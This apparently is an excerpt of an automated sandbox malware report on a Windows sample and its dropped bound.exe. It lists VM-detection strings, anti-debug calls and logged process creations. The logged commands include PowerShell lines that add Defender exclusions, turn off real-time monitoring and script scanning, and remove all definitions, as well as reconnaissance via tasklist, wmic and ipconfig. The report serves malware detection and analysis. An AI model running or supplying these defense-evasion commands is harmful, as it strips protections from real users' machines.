                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595235
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595106
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594981
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594766
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594638
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594532
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594407
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594297
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 588059
                Source: Amcache.hve.29.drBinary or memory string: VMware
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dqemu-ga
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmtoolsd
                Source: Amcache.hve.29.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: decodeqemu-ga
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f15vmsrvc
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvboxservice
                Source: Amcache.hve.29.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: rfvmwareservice
                Source: Amcache.hve.29.drBinary or memory string: vmci.sys
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                Source: Amcache.hve.29.drBinary or memory string: VMware20,1
                Source: Amcache.hve.29.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.29.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.29.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.29.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.29.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.29.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 4Lfvmtoolsd
                Source: Amcache.hve.29.drBinary or memory string: VMware VMCI Bus Device
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwareuser
                Source: Amcache.hve.29.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.29.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmusrvc
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                Source: Amcache.hve.29.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.29.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.29.drBinary or memory string: vmci.syshbin
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409474610.000001DCB5DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwaretray
                Source: Amcache.hve.29.drBinary or memory string: VMware, Inc.
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxtray
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                Source: Amcache.hve.29.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.29.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.29.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.29.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f4vmusrvc
                Source: Amcache.hve.29.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: sfvmwaretray
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvboxtray
                Source: Amcache.hve.29.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: bound.exe, 00000011.00000002.1603619017.00000254B4EB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmsrvc
                Source: Amcache.hve.29.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.29.drBinary or memory string: \driver\vmci,\driver\pci
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwareuser
                Source: Amcache.hve.29.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f8vmware
                Source: Amcache.hve.29.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                Source: Amcache.hve.29.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxservice
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwareservice
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EAD0D12C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E6C89060 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FF8E6C89060
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD23480 GetProcessHeap,0_2_00007FF7EAD23480
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EAD0D12C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0D30C SetUnhandledExceptionFilter,0_2_00007FF7EAD0D30C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7EAD0C8A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD1A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EAD1A614
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD0D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7EAD0D12C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD0D30C SetUnhandledExceptionFilter,2_2_00007FF7EAD0D30C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD0C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF7EAD0C8A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD1A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7EAD1A614
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7963248 IsProcessorFeaturePresent,00007FF8F8751A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8F8751A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E7963248
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21CB7 SetUnhandledExceptionFilter,2_2_00007FF8E7A21CB7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A2212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E7A2212B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A9DFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E7A9DFFC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80D4390 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E80D4390
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80F339C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E80F339C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E8133318 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E8133318
                Source: C:\Users\user\AppData\Local\Temp\bound.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: bound.exe PID: 7976, type: MEMORYSTR
                Source: Yara matchFile source: dropped/ConDrv, type: DROPPED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                Source: C:\Users\user\AppData\Local\Temp\bound.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 0_2_00007FF7EAD29570 cpuid 0_2_00007FF7EAD29570
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_ctypes.pyd VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\blank.aes VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_lzma.pyd VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_bz2.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_sqlite3.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_socket.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\select.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
